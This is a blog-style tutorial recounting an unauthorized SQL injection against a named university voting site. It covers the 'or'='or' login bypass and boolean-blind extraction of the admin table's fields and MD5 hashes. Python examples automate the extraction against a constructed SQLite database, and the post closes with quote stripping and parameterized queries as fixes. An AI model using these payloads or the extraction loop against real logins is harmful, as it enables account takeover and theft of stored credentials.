We know that a website's back end needs to validate user input. If it does not, a user can even type SQL statements that operate on the back-end database. I had never really experienced such a fun thing myself. A few days ago the school held a "your favourite counselor" voting activity. The website was probably written by a student team, and a student cracked the administrator account and password of the site. I asked him about the principle, learned the steps of the attack, and practised them again myself. Thanks to Jing; without him I would not know this, nor would this blog post exist.
The website cracked in this article is http://xgc.nuist.edu.cn/vote/vote_login.asp. After the activity ended the site could no longer be opened, or perhaps the students who wrote it realised the severity of the vulnerability and fixed it, so the content of this article no longer applies to that site. I have written up the detailed cracking process to share with you. The logic in this article is dense and needs to be read patiently, but the text is about the cracking steps and the general idea. If you have any questions, leave a comment and we will discuss :)
1. Does a website have a SQL injection vulnerability?
A website usually contains a user table (user name and password) and an administrator table (administrator name and password). After you enter a user name and password, the back end runs an SQL statement to check whether a matching user AND password exist, for example SELECT * FROM SomeTable WHERE UserName = '$username' AND pwd = '$pwd'. If this query returns a row, the login succeeds.
Now imagine entering 'or'='or' in both the student ID and the password box and submitting. The statement becomes SELECT * FROM SomeTable WHERE UserName = ''or'='or'' AND pwd = ''or'='or''. The database tokenizes this into a logical expression made of these pieces:
- UserName = '' (false)
- or
- '=' (a bare string literal, which this site's database engine evaluated as true)
- or
- '' (false)
- and
- pwd = '' (false)
- or
- '=' (true)
- or
- '' (false)
Because AND binds tighter than OR, the whole WHERE clause reads 0 | 1 | (0 & 0) | 1 | 0, which is true: once one operand of an OR is true, nothing after it can make the expression false. The query returns rows, so the login succeeds, and in practice it did. Treating the bare literal '=' as true is a quirk of the engine behind this site; the same trick in its portable form is ' or '1'='1, where the tautology is an explicit comparison that every SQL engine evaluates as true.
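The following is an added example, not code from the original page or from the site's authors. It models the login described above in Python with an in-memory SQLite database standing in for the site's back end; the admin table, its single account and the MD5 password column are constructed. Because the page's payload is injected through the password box as well, the model pastes the submitted password text into the query unhashed, exactly as the page describes. SQLite converts a non-numeric string to 0 in a boolean context, so the page's literal 'or'='or' does not log in on it, while the portable form does; the example also shows why the same text must go in both boxes.

```python
import hashlib
import sqlite3


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def new_db():
    """Constructed stand-in for the site's admin table: one account, MD5 password column."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, admin TEXT, pass TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'root', ?)", (md5hex("letmein"),))
    return con


def vulnerable_sql(username, pwd):
    """The pattern the page describes: both inputs pasted straight into the SQL text."""
    return f"SELECT * FROM admin WHERE admin = '{username}' AND pass = '{pwd}'"


def login_concat(con, username, pwd):
    """Login succeeds when the concatenated query returns at least one row."""
    try:
        return con.execute(vulnerable_sql(username, pwd)).fetchone() is not None
    except sqlite3.OperationalError:
        return False  # malformed SQL (e.g. an odd number of quotes) just fails the login


PAYLOAD_PAGE = "'or'='or'"        # the page's universal password
PAYLOAD_PORTABLE = "' or '1'='1"  # same idea, tautology written as an explicit comparison


def demo():
    con = new_db()
    return {
        "legit": login_concat(con, "root", md5hex("letmein")),
        "wrong_password": login_concat(con, "root", md5hex("guess")),
        # SQLite treats the bare literal '=' as 0, so the page's exact text fails here
        "page_payload": login_concat(con, PAYLOAD_PAGE, PAYLOAD_PAGE),
        "portable_payload": login_concat(con, PAYLOAD_PORTABLE, PAYLOAD_PORTABLE),
        # AND binds tighter than OR: a tautology in the username box alone is swallowed
        # by "AND pass = 'x'", which is why the page puts the same text in both boxes
        "username_only": login_concat(con, PAYLOAD_PORTABLE, "x"),
    }


if __name__ == "__main__":
    print(vulnerable_sql(PAYLOAD_PAGE, PAYLOAD_PAGE))
    for name, outcome in demo().items():
        print(f"{name}: {'logged in' if outcome else 'rejected'}")
```

Run it and compare the printed query with the tokenized breakdown above; the only difference between the page's payload and the portable one is whether the engine is asked to evaluate a bare string or a comparison.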
2. Principle of cracking the back-end database
Enter 'or'='or' in both the user name and the password box. As shown in section 1, the expression is true because of the OR: whatever follows it, "true or false" and "true or true" are both true. The key is the '=' in the middle of 'or'='or', a string literal that the engine treats as always true. If we replace that '=' with an SQL expression, the whole WHERE clause is true exactly when the expression is true and false otherwise. The login result thus becomes a one-bit oracle that answers a yes/no question about the database (a boolean-based blind injection).
The following steps require the same text in both boxes, because the back-end statement may be written as SELECT * FROM SomeTable WHERE UserName = '$username' AND pwd = '$pwd' or as SELECT * FROM SomeTable WHERE pwd = '$pwd' AND UserName = '$username'. In either order, as long as both boxes contain the same text and the SQL expression inside it is true, the whole expression is true: the AND only joins two false operands, and the surrounding ORs override it. Another advantage is that one string is convenient to copy and paste.
Now we write SQL expressions that test the contents of the database, one yes/no question at a time.
3. Obtain the table name of the back-end database
Replace the expression with (select count(*) FROM TableName)<>0. This subquery returns the number of records in a table, so you must guess the table name. If the guess is right and the table is not empty, the count is certainly not 0, the expression is true and the login succeeds. If the table does not exist the query fails, which the login page reports just like a false answer. Common table names are much the same everywhere; trying them one by one, we find a table named admin whose contents are not empty. Obviously this table stores the administrator information.
4. Obtain the field names of the back-end table
Now we know the table is called admin. Next we try to find the fields in this table.
Replace the expression with (select count(*) FROM admin where len(FieldName)>0)<>0. This tests whether the table admin contains a field with that name: LEN(FieldName)>0 says the field's value is longer than 0 characters, which is true for any populated row if the field exists. If the field exists, the SELECT returns a non-zero count, the whole expression is true and the field name is confirmed; if it does not exist the query fails and the login is refused.
With this method three key fields are found: id, admin and pass.
5. Obtain the length of a field
What we have so far: an admin table with the fields id, admin and pass. User names and passwords are commonly stored in the back end as MD5 hashes, 32 characters long. Let's test whether that is the case here.
Replace the expression with (select count(*) FROM admin where len(FieldName)=32)<>0. With FieldName set to admin and to pass the result is true in both cases, so the administrator account and password are stored as 32-character hashed values.
6. Obtain the administrator account and password
An MD5 hash written in hexadecimal is 32 characters long and consists only of the characters 0-9 and A-F.
1. Get the administrator account
Change the expression to (select count(*) FROM admin where left(admin,1)='A')>0, meaning: I guess that the first character of some admin account is A. If the guess is right, the expression is true. If not, replace A with each of 0-9 and B-F in turn until it succeeds. Once it succeeds, guess the second character of the account: if the first character was 5 and I guess the second is A, the expression becomes (SELECT COUNT(*) FROM admin where left(admin,2)='5a')>0, where the 1 in LEFT() becomes 2 and the compared string '5a' contains the already determined 5. Repeating this we recover the entire 32-character MD5 string.
2. Get the id corresponding to this account
Why obtain the id of this account? The previous step finds an account, and the same method finds a password, but a table can contain several administrator accounts and passwords, so how do we know which password belongs to which account? We use id: one id corresponds to one record, and one record holds exactly one account with its matching password. Without the id filter, a character-by-character guess of pass could mix characters from different rows.
Change the expression to (select count(*) FROM admin where left(admin,1)='5' AND id=1)>0, assuming the account's first character is 5. If the expression is true, the account's id is 1; if not, replace 1 with other numbers one by one.
3. Get the password of the account
Now we have guessed an administrator's account and know its id (assume it is 4). We only need the password stored in that record. Similarly, change the expression to (select count(*) FROM admin where left(pass,1)='A' AND id=4)>0; note that id 4 is already known, so every guess is pinned to that one row. The rest is the same as for the account, and finally we obtain the 32-character MD5 string of the password.
* Note: if obtaining each character by hand is too tedious, you can write a program (C#, for example) that simulates the login and drives the guessing loop to get the result quickly.
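As an added example (not the page's or the original student's code), here is the whole procedure of sections 3 to 6 automated in Python against a constructed SQLite stand-in for the site's database. The table, its two rows (ids 1 and 4, accounts root and jing, MD5 passwords) and the candidate name lists are assumptions. SQLite has no LEN() or LEFT(), so the expressions use length() and substr() instead; on an Access back end you would substitute the page's functions. SQLite compares text case-sensitively, so the hash alphabet is lowercase. Note how guessing a table or column that does not exist makes the query fail, which the login form reports exactly like a false answer.

```python
import hashlib
import sqlite3

HEX = "0123456789abcdef"                      # alphabet of a hex MD5 string
ALNUM = "abcdefghijklmnopqrstuvwxyz0123456789"  # assumed alphabet for account names
SEED = {1: ("root", "letmein"), 4: ("jing", "vote2009")}  # constructed accounts


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_oracle():
    """Constructed stand-in for the site. Returns a function that answers the only
    question the attacker can ask: does a login with this text in both boxes succeed?"""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, admin TEXT, pass TEXT)")
    for row_id, (name, secret) in SEED.items():
        con.execute("INSERT INTO admin VALUES (?, ?, ?)", (row_id, name, md5hex(secret)))

    def login_succeeds(text):
        sql = f"SELECT * FROM admin WHERE admin = '{text}' AND pass = '{text}'"
        try:
            return con.execute(sql).fetchone() is not None
        except sqlite3.OperationalError:
            return False  # unknown table/column: SQL error, the page just refuses the login
    return login_succeeds


def ask(oracle, expr):
    """The page's trick: 'or'='or' with the '=' swapped for an SQL boolean expression."""
    return oracle(f"'or ({expr}) or'")


def count_nonzero(table, where):
    return f"(select count(*) from {table} where {where})<>0"


def find_table(oracle, candidates):
    """Section 3: a table exists and is non-empty iff count(*)<>0 is answered true."""
    return next((t for t in candidates
                 if ask(oracle, f"(select count(*) from {t})<>0")), None)


def find_fields(oracle, table, candidates):
    """Section 4: a field exists iff length(field)>0 does not make the query fail."""
    return [f for f in candidates if ask(oracle, count_nonzero(table, f"length({f})>0"))]


def find_row_ids(oracle, table, max_id=20):
    """Section 6.2: which ids are present, so each later guess is pinned to one row."""
    return [i for i in range(1, max_id + 1) if ask(oracle, count_nonzero(table, f"id={i}"))]


def field_length(oracle, table, field, row_id, max_len=64):
    """Section 5: try lengths until length(field)=n is answered true for this row."""
    for n in range(1, max_len + 1):
        if ask(oracle, count_nonzero(table, f"id={row_id} and length({field})={n}")):
            return n
    return None


def extract(oracle, table, field, row_id, charset):
    """Sections 6.1 and 6.3: grow the known prefix one character at a time."""
    length = field_length(oracle, table, field, row_id)
    if length is None:
        return None
    known = ""
    for _ in range(length):
        for c in charset:
            guess = known + c
            prefix = f"substr({field},1,{len(guess)})='{guess}'"
            if ask(oracle, count_nonzero(table, f"id={row_id} and {prefix}")):
                known = guess
                break
        else:
            return None  # a character outside the charset: widen the alphabet and retry
    return known


def run_attack():
    oracle = make_oracle()
    table = find_table(oracle, ["users", "user", "admin", "administrator"])
    fields = find_fields(oracle, table, ["id", "username", "admin", "pass", "password"])
    result = {}
    for row_id in find_row_ids(oracle, table):
        name = extract(oracle, table, "admin", row_id, ALNUM)
        pw_hash = extract(oracle, table, "pass", row_id, HEX)
        result[row_id] = (name, pw_hash)
    return table, fields, result


if __name__ == "__main__":
    table, fields, rows = run_attack()
    print(table, fields)
    for row_id, (name, pw_hash) in rows.items():
        print(f"id={row_id} admin={name} pass={pw_hash}")
```

Each call to ask() is one login attempt, so recovering a 32-character hash costs at most 32 x 16 attempts plus the length search; that is the loop the page suggests automating, and also the request pattern (hundreds of failed logins from one address with near-identical inputs) that a defender can alert on.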
7. Convert the MD5-hashed account and password to plaintext
Some websites on the Internet hold very large lookup tables that map MD5 hashes back to their plaintext. Enter the hash you obtained and, if it is in the table, the plaintext is displayed. This works here because the stored hashes are unsalted MD5, so any common password is found immediately.
8. Find the website's administrator login page
Even with an administrator account and password, you cannot log in if you cannot find the administrator login page. For this site, the address given to ordinary students is http://xgc.nuist.edu.cn/vote/vote_login.asp.
By guessing, the administrator's login address is probably http://xgc.nuist.edu.cn/vote/login.asp, and in fact it is.
9. Log on to the website back end
10. Summary
Let's look at the security of this website...
How should user input be validated? The simplest method is to strip or escape the ' character in user input before it reaches the query. The better method is to query the database with parameters, so that user input is never inserted into the SQL text at all. Note that the classic ASP form SELECT * FROM SomeTable WHERE UserName = '" & UserName & "' AND pwd = '" & pwd & "' is string concatenation and is exactly the vulnerable pattern exploited above; a parameterized query keeps the SQL fixed and passes the values separately (in ASP, through an ADODB.Command with parameters). If you want to make cracking harder still, you can also require a verification code at login, which slows down the automated guessing loop.
The world is too dangerous. The statements above only read the information we wanted; if someone injects a DROP TABLE command instead, the consequences are unimaginable! Pay attention to these problems when you build your own website.
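The two fixes suggested in the summary, as an added example (not code from the page or from the site): the same constructed SQLite admin table as before, one login that strips every ' from the input and one that binds the values as parameters. Both block the payloads from section 1, but stripping changes legitimate data (an account name containing an apostrophe can no longer log in), while binding leaves the value intact. The account names and passwords are assumptions.

```python
import hashlib
import sqlite3


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def new_db():
    """Constructed stand-in for the site's admin table (two accounts, MD5 passwords)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER, admin TEXT, pass TEXT)")
    con.execute("INSERT INTO admin VALUES (1, 'root', ?)", (md5hex("letmein"),))
    con.execute("INSERT INTO admin VALUES (2, ?, ?)", ("o'brien", md5hex("pw")))
    return con


def login_strip_quotes(con, username, pwd):
    """First suggestion from the summary: drop every ' before concatenating the query."""
    username, pwd = username.replace("'", ""), pwd.replace("'", "")
    sql = f"SELECT id FROM admin WHERE admin = '{username}' AND pass = '{pwd}'"
    return con.execute(sql).fetchone() is not None


def login_param(con, username, pwd):
    """Second suggestion, done properly: fixed SQL text, values bound as parameters."""
    sql = "SELECT id FROM admin WHERE admin = ? AND pass = ?"
    return con.execute(sql, (username, pwd)).fetchone() is not None


PAYLOADS = ["'or'='or'", "' or '1'='1", "'or (select count(*) from admin)<>0 or'"]


def demo():
    con = new_db()
    return {
        "strip_blocks_payloads": not any(login_strip_quotes(con, p, p) for p in PAYLOADS),
        "param_blocks_payloads": not any(login_param(con, p, p) for p in PAYLOADS),
        "strip_legit_root": login_strip_quotes(con, "root", md5hex("letmein")),
        "param_legit_root": login_param(con, "root", md5hex("letmein")),
        # stripping alters real data: o'brien becomes obrien and no longer matches
        "strip_legit_obrien": login_strip_quotes(con, "o'brien", md5hex("pw")),
        "param_legit_obrien": login_param(con, "o'brien", md5hex("pw")),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Stripping quotes only works while every injected value lands inside a quoted string; a numeric parameter such as id=1 needs no quote at all, which is one more reason to prefer binding.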